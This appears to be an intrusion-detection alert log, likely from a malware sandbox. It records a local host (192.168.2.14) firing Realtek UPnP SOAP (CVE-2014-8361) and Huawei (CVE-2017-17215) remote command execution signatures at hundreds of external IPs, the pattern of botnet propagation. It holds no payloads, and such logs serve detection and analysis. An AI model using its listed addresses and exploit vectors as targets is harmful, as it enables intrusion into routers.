                                                07/20/24-23:06:26.043403TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4636052869192.168.2.14208.46.25.166
                                                07/20/24-23:06:01.993987TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25645852869192.168.2.14118.217.130.214
                                                07/20/24-23:05:52.493809TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3302052869192.168.2.1445.52.160.244
                                                07/20/24-23:06:01.219202TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24694052869192.168.2.141.64.96.57
                                                07/20/24-23:06:06.458215TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613646252869192.168.2.14191.211.23.107
                                                07/20/24-23:05:57.437168TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5082052869192.168.2.14148.121.201.0
                                                07/20/24-23:05:37.469321TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4445852869192.168.2.14193.109.205.113
                                                07/20/24-23:05:40.359417TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615363452869192.168.2.14198.53.78.79
                                                07/20/24-23:05:35.270124TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4898252869192.168.2.1440.31.56.204
                                                07/20/24-23:05:36.245639TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3840852869192.168.2.148.166.54.209
                                                07/20/24-23:06:03.095402TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23985452869192.168.2.14133.34.160.194
                                                07/20/24-23:05:58.930253TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3292452869192.168.2.14161.67.254.245
                                                07/20/24-23:05:56.137269TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5149637215192.168.2.1441.71.243.109
                                                07/20/24-23:06:01.795331TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5642052869192.168.2.14149.133.154.242
                                                07/20/24-23:06:10.782901TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5151852869192.168.2.1432.213.57.170
                                                07/20/24-23:05:58.192675TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3756652869192.168.2.14135.11.85.84
                                                07/20/24-23:05:57.861533TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613728852869192.168.2.14113.89.22.57
                                                07/20/24-23:05:35.201041TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5071652869192.168.2.141.200.111.50
                                                07/20/24-23:05:36.325773TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4618037215192.168.2.14125.15.129.89
                                                07/20/24-23:05:47.965851TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4364452869192.168.2.14156.53.15.210
                                                07/20/24-23:06:25.634766TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615023652869192.168.2.1419.144.127.78
                                                07/20/24-23:06:29.727366TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3309852869192.168.2.14204.191.187.136
                                                07/20/24-23:05:33.833027TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4133437215192.168.2.1441.112.53.44
                                                07/20/24-23:06:21.974244TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5663452869192.168.2.1442.207.160.235
                                                07/20/24-23:05:34.648426TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4345637215192.168.2.14197.167.43.41
                                                07/20/24-23:05:40.458812TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5777652869192.168.2.14136.85.95.150
                                                07/20/24-23:05:45.389146TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4910437215192.168.2.1499.113.4.189
                                                07/20/24-23:05:57.181822TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614334852869192.168.2.14187.252.112.173
                                                07/20/24-23:06:31.320054TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613608252869192.168.2.1497.168.205.214
                                                07/20/24-23:06:16.731750TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3761252869192.168.2.14188.42.211.0
                                                07/20/24-23:06:36.472084TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24633052869192.168.2.1481.227.7.243
                                                07/20/24-23:06:12.549242TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614311252869192.168.2.14175.252.153.232
                                                07/20/24-23:05:50.501247TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5615437215192.168.2.1441.249.186.31
                                                07/20/24-23:06:54.833146TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23928252869192.168.2.149.221.109.93
                                                07/20/24-23:05:57.540063TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614337652869192.168.2.14199.88.11.180
                                                07/20/24-23:06:27.858951TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614076852869192.168.2.14126.244.235.71
                                                07/20/24-23:05:45.193921TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3725652869192.168.2.14120.185.72.185
                                                07/20/24-23:05:39.839035TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4787452869192.168.2.1474.88.51.163
                                                07/20/24-23:05:59.457721TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3606852869192.168.2.1446.67.182.106
                                                07/20/24-23:05:52.502843TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26089652869192.168.2.14194.100.123.200
                                                07/20/24-23:05:48.858199TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4617637215192.168.2.14197.84.156.131
                                                07/20/24-23:05:57.802006TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615403852869192.168.2.1458.94.23.51
                                                07/20/24-23:05:47.129772TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6081437215192.168.2.14157.165.95.219
                                                07/20/24-23:06:05.290476TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615025852869192.168.2.14138.94.192.114
                                                07/20/24-23:05:35.830692TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614779052869192.168.2.14155.49.251.8
                                                07/20/24-23:05:56.928848TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5940652869192.168.2.14199.41.219.25
                                                07/20/24-23:05:52.499861TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5113052869192.168.2.14166.212.7.50
                                                07/20/24-23:06:02.606012TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4739652869192.168.2.14162.186.165.69
                                                07/20/24-23:06:05.981181TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614185052869192.168.2.1438.245.190.228
                                                07/20/24-23:06:06.631877TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5919037215192.168.2.14150.80.114.33
                                                07/20/24-23:05:50.498027TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4925637215192.168.2.14145.150.200.133
                                                07/20/24-23:05:33.830272TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4472237215192.168.2.14157.96.246.174
                                                07/20/24-23:06:01.048493TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5960052869192.168.2.14208.186.76.120
                                                07/20/24-23:05:42.221844TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5265037215192.168.2.14111.250.239.82
                                                07/20/24-23:05:42.237871TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5994837215192.168.2.14157.172.203.166
                                                07/20/24-23:05:57.187454TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3837052869192.168.2.1483.130.210.209
                                                07/20/24-23:05:59.827264TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24134452869192.168.2.14169.222.175.35
                                                07/20/24-23:05:35.827188TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614027052869192.168.2.14198.163.171.175
                                                07/20/24-23:05:50.501247TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4287037215192.168.2.14157.132.69.1
                                                07/20/24-23:05:46.707199TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615360252869192.168.2.145.107.169.199
                                                07/20/24-23:05:37.474845TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24965852869192.168.2.1439.176.203.73
                                                07/20/24-23:06:13.684507TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6041852869192.168.2.14217.178.244.70
                                                07/20/24-23:05:35.988385TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3875252869192.168.2.1438.30.142.71
                                                07/20/24-23:06:02.113509TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613597652869192.168.2.1449.168.241.228
                                                07/20/24-23:05:34.626588TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6081237215192.168.2.14157.27.2.225
                                                07/20/24-23:06:34.260416TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3783852869192.168.2.14181.198.232.113
                                                07/20/24-23:05:37.612113TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3774252869192.168.2.1478.147.130.95
                                                07/20/24-23:05:45.414465TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4240237215192.168.2.14218.24.27.144
                                                07/20/24-23:05:42.180899TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5622837215192.168.2.14197.205.16.75
                                                07/20/24-23:05:40.347577TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24098852869192.168.2.1423.7.74.55
                                                07/20/24-23:06:01.287009TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615063852869192.168.2.14188.84.165.22
                                                07/20/24-23:06:00.746219TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5278052869192.168.2.14173.224.217.200
                                                07/20/24-23:05:33.861088TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5817437215192.168.2.14138.194.165.219
                                                07/20/24-23:05:47.101729TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3566837215192.168.2.14157.115.117.80
                                                07/20/24-23:05:58.382027TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613461452869192.168.2.14134.186.183.71
                                                07/20/24-23:06:00.018219TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3646652869192.168.2.14162.167.107.129
                                                07/20/24-23:06:01.244494TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4997852869192.168.2.1414.164.85.37
                                                07/20/24-23:05:35.348979TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614930852869192.168.2.1481.167.63.48
                                                07/20/24-23:05:50.600216TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3365437215192.168.2.1447.251.150.80
                                                07/20/24-23:05:35.201174TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5579852869192.168.2.14125.66.54.149
                                                07/20/24-23:05:50.515904TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4567437215192.168.2.14197.24.192.82
                                                07/20/24-23:05:37.445004TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4396252869192.168.2.1452.248.88.164
                                                07/20/24-23:06:00.581239TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25002852869192.168.2.1443.68.128.224
                                                07/20/24-23:06:09.712957TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614942052869192.168.2.1468.123.141.153
                                                07/20/24-23:05:33.830272TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4020237215192.168.2.14157.157.49.65
                                                07/20/24-23:05:36.323663TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3492237215192.168.2.14157.3.23.49
                                                07/20/24-23:05:45.409134TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3619037215192.168.2.14157.1.152.156
                                                07/20/24-23:05:44.698080TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3623252869192.168.2.1485.190.99.234
                                                07/20/24-23:05:57.034294TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25059852869192.168.2.1458.74.85.108
                                                07/20/24-23:05:47.948716TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614232252869192.168.2.14139.27.203.218
                                                07/20/24-23:05:57.974933TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613579252869192.168.2.1413.149.201.70
                                                07/20/24-23:05:52.551649TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25779852869192.168.2.14135.180.161.252
                                                07/20/24-23:05:45.811748TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5399452869192.168.2.1473.39.239.240
                                                07/20/24-23:05:36.532921TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4887237215192.168.2.1441.87.18.27
                                                07/20/24-23:05:42.135703TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5313237215192.168.2.1441.33.26.97
                                                07/20/24-23:06:08.048662TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4299252869192.168.2.14129.23.253.0
                                                07/20/24-23:06:27.822681TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5273252869192.168.2.14177.18.126.192
                                                07/20/24-23:06:08.268005TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5200252869192.168.2.14149.251.169.133
                                                07/20/24-23:06:01.467143TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615100452869192.168.2.14146.113.147.42
                                                07/20/24-23:06:02.766400TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613413652869192.168.2.1424.169.159.85
                                                07/20/24-23:06:40.564079TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4531052869192.168.2.14204.10.66.64
                                                07/20/24-23:05:40.453690TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24190252869192.168.2.14119.238.64.83
                                                07/20/24-23:05:57.576576TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3676052869192.168.2.1487.236.126.160
                                                07/20/24-23:07:03.190386TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614158852869192.168.2.1449.63.100.161
                                                07/20/24-23:06:01.850879TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4388052869192.168.2.14152.22.234.187
                                                07/20/24-23:05:52.488878TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5701052869192.168.2.14208.86.138.213
                                                07/20/24-23:05:45.468009TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4851837215192.168.2.1441.26.49.130
                                                07/20/24-23:06:01.160489TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6071452869192.168.2.14149.27.20.44
                                                07/20/24-23:05:40.237125TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3478252869192.168.2.14204.197.104.210
                                                07/20/24-23:06:02.474846TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25082652869192.168.2.14118.21.82.230
                                                07/20/24-23:05:36.065114TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614269652869192.168.2.1446.103.116.159
                                                07/20/24-23:05:59.377287TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613714252869192.168.2.14139.245.84.27
                                                07/20/24-23:06:02.385438TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4069652869192.168.2.14176.29.173.73
                                                07/20/24-23:05:50.531553TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3883437215192.168.2.14197.10.210.140
                                                07/20/24-23:05:59.834038TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23712252869192.168.2.14138.178.254.97
                                                07/20/24-23:05:59.136809TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4809252869192.168.2.14207.85.188.236
                                                07/20/24-23:07:34.305255TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615198252869192.168.2.14149.123.144.134
                                                07/20/24-23:05:56.124566TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3779037215192.168.2.14197.213.161.97
                                                07/20/24-23:06:54.482380TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3318252869192.168.2.14210.242.56.65
                                                07/20/24-23:06:08.736347TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613387452869192.168.2.1497.212.42.191
                                                07/20/24-23:05:59.394050TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614284052869192.168.2.14123.2.215.104
                                                07/20/24-23:05:46.119639TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4439237215192.168.2.14157.58.95.170
                                                07/20/24-23:06:17.564288TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614665652869192.168.2.14159.160.235.206
                                                07/20/24-23:06:19.786611TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3344252869192.168.2.1449.66.14.28
                                                07/20/24-23:06:02.167898TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23830252869192.168.2.1477.217.131.179
                                                07/20/24-23:05:59.849854TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614182252869192.168.2.14216.198.201.137
                                                07/20/24-23:05:57.538013TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3686652869192.168.2.14209.32.8.160
                                                07/20/24-23:06:24.616747TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4978652869192.168.2.1460.62.84.161
                                                07/20/24-23:05:38.645534TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615306452869192.168.2.1439.183.105.121
                                                07/20/24-23:05:42.238265TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3798637215192.168.2.14157.205.57.71
                                                07/20/24-23:06:28.937691TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616068052869192.168.2.1474.144.172.46
                                                07/20/24-23:05:38.949221TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4624637215192.168.2.1431.215.216.138
                                                07/20/24-23:05:37.497165TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5793452869192.168.2.14156.87.172.3
                                                07/20/24-23:05:37.971787TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614000052869192.168.2.14140.200.78.210
                                                07/20/24-23:05:53.677192TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5978652869192.168.2.14222.102.111.169
                                                07/20/24-23:05:37.520621TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25138052869192.168.2.1417.150.249.106
                                                07/20/24-23:05:40.330485TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25687452869192.168.2.14223.214.5.89
                                                07/20/24-23:05:39.331620TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5583452869192.168.2.1459.45.134.101
                                                07/20/24-23:05:46.257796TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615655452869192.168.2.148.133.12.9
                                                07/20/24-23:06:07.071207TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5253252869192.168.2.14188.41.244.103
                                                07/20/24-23:05:42.220682TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3546237215192.168.2.14156.222.96.172
                                                07/20/24-23:05:58.403603TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5176652869192.168.2.14104.173.87.38
                                                07/20/24-23:05:38.573762TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3321252869192.168.2.1448.151.66.255
                                                07/20/24-23:05:40.471777TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5203452869192.168.2.1417.102.178.46
                                                07/20/24-23:06:07.055543TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615952052869192.168.2.1465.1.182.111
                                                07/20/24-23:06:19.828184TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5965852869192.168.2.1469.227.93.244
                                                07/20/24-23:05:55.889998TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4499037215192.168.2.14212.191.102.237
                                                07/20/24-23:05:36.338927TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5913037215192.168.2.1441.97.149.25
                                                07/20/24-23:06:21.839686TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3319652869192.168.2.14146.223.122.107
                                                07/20/24-23:05:47.460786TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5419052869192.168.2.14103.131.184.129
                                                07/20/24-23:06:19.714340TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3766452869192.168.2.14162.188.233.6
                                                07/20/24-23:07:09.612324TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3700652869192.168.2.14169.178.252.2
                                                07/20/24-23:05:39.055909TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4336837215192.168.2.14172.164.177.95
                                                07/20/24-23:06:16.347950TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5584652869192.168.2.14116.229.240.238
                                                07/20/24-23:06:01.593709TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3953452869192.168.2.14198.58.66.130
                                                07/20/24-23:05:37.489811TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3875252869192.168.2.1468.85.217.10
                                                07/20/24-23:05:39.876249TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613440452869192.168.2.14174.146.134.66
                                                07/20/24-23:05:50.554912TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5083837215192.168.2.14197.194.65.54
                                                07/20/24-23:06:19.742051TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615867452869192.168.2.1465.30.47.252
                                                07/20/24-23:05:57.161619TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26090052869192.168.2.14146.82.123.202
                                                07/20/24-23:06:00.698150TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5335652869192.168.2.14116.220.0.95
                                                07/20/24-23:06:09.635095TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615089652869192.168.2.14136.78.52.143
                                                07/20/24-23:06:01.143971TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616085252869192.168.2.14218.31.236.194
                                                07/20/24-23:05:57.148116TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25631852869192.168.2.14113.250.68.242
                                                07/20/24-23:05:36.532766TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3797837215192.168.2.1441.208.188.114
                                                07/20/24-23:05:40.430092TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5060652869192.168.2.1467.159.158.152
                                                07/20/24-23:05:45.359662TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4035237215192.168.2.14157.90.111.171
                                                07/20/24-23:06:18.014309TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23421852869192.168.2.14109.168.44.251
                                                07/20/24-23:05:39.050437TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3554237215192.168.2.14157.67.157.233
                                                07/20/24-23:06:07.071207TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615336252869192.168.2.1438.236.48.150
                                                07/20/24-23:05:57.109755TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24709452869192.168.2.14128.70.217.129
                                                07/20/24-23:05:59.227912TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613731852869192.168.2.1446.189.159.251
                                                07/20/24-23:05:50.498027TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5531037215192.168.2.14175.161.137.109
                                                07/20/24-23:05:42.257476TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4718237215192.168.2.14197.42.249.15
                                                07/20/24-23:05:46.422378TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615147252869192.168.2.1491.116.209.39
                                                07/20/24-23:06:00.247273TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24238452869192.168.2.14133.192.223.98
